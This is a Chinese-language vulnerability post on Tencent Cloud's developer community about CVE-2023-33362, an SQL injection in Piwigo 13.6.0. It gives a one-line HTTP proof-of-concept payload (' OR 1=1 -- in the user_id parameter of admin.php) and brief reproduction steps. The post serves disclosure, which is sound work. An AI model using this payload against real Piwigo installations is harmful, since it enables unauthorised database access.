文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
社区首页 >专栏 >Piwigo 13.6.0 SQL注入漏洞详解

Piwigo 13.6.0 SQL注入漏洞详解

原创
作者头像
qife122
发布2025-12-15 23:47:56
发布2025-12-15 23:47:56
660
举报
文章被收录于专栏:网络安全技术点滴分享网络安全技术点滴分享

漏洞标题:Piwigo 13.6.0 - SQL注入

日期:2025-11-25

漏洞作者:CodeSecLab

软件商主页: https://github.com/Piwigo/Piwigo

软件链接:https://github.com/Piwigo/Piwigo

版本:13.6.0

测试环境:Windows

CVE:CVE-2023-33362

概念验证:

代码语言:http
复制
GET /admin.php?page=profile&user_id=' OR 1=1 --  HTTP/1.1
Host: piwigo

复现步骤:

  1. 以管理员用户身份登录。
  2. 发送上述请求。
  3. 观察结果。 eQ7SPjxu3wq/iZYjEnW1MGmV38jUHbHn2zgMGOH0b6HX88G3Bid6YZy0EvGAkKdU

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

计算机
网络安全
web安全
sql注入
php-5.3

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

计算机
网络安全
web安全
sql注入
php-5.3
#人工智能
#AIGC
#OpenAI
#程序那些事
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
目录
  • 漏洞标题:Piwigo 13.6.0 - SQL注入
  • 日期:2025-11-25
  • 漏洞作者:CodeSecLab
  • 软件商主页: https://github.com/Piwigo/Piwigo
  • 软件链接:https://github.com/Piwigo/Piwigo
  • 版本:13.6.0
  • 测试环境:Windows
  • CVE:CVE-2023-33362
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2026 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论